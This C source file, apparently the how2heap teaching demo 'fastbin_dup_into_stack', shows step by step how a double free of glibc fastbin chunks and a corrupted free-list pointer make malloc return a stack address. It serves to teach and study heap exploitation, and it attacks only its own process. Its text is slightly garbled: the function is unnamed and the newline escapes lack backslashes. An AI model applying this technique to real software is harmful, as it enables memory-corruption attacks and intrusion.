fastbin_dup_into_stack log

int ()
{
	printf("This file extends on fastbin_dup.c by tricking malloc inton"
	       "returning a pointer to a controlled location (in this case, the stack).n");

	unsigned long long stack_var;

	printf("The address we want malloc() to return is %p.n", 8+(char *)&stack_var);

	printf("Allocating 3 buffers.n");
	int *a = malloc(8);
	int *b = malloc(8);
	int *c = malloc(8);

	printf("1st malloc(8): %pn", a);
	printf("2nd malloc(8): %pn", b);
	printf("3rd malloc(8): %pn", c);

	printf("Freeing the first one...n");
	free(a);

	printf("If we free %p again, things will crash because %p is at the top of the free list.n", a, a);
	

	printf("So, instead, we'll free %p.n", b);
	free(b);

	printf("Now, we can free %p again, since it's not the head of the free list.n", a);
	free(a);

	printf("Now the free list has [ %p, %p, %p ]. "
		"We'll now carry out our attack by modifying data at %p.n", a, b, a, a);
	unsigned long long *d = malloc(8);

	printf("1st malloc(8): %pn", d);
	printf("2nd malloc(8): %pn", malloc(8));
	printf("Now the free list has [ %p ].n", a);
	printf("Now, we have access to %p while it remains at the head of the free list.n"
		"so now we are writing a fake free size (in this case, 0x20) to the stack,n"
		"so that malloc will think there is a free chunk there and agree ton"
		"return a pointer to it.n", a);
	stack_var = 0x21;

	printf("Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.n", a);
	*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

	printf("3rd malloc(8): %p, putting the stack address on the free listn", malloc(8));
	printf("4th malloc(8): %pn", malloc(8));
}